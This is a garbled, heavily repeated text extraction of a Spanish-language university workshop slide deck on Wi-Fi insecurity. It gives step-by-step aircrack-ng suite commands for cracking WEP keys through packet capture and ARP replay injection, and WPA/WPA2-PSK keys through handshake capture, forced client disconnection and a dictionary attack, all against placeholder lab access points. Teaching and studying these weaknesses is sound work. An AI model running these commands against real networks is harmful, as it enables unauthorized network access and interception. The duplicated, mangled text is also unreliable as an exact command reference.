bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 66: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 67: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 68: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 69: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 70: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

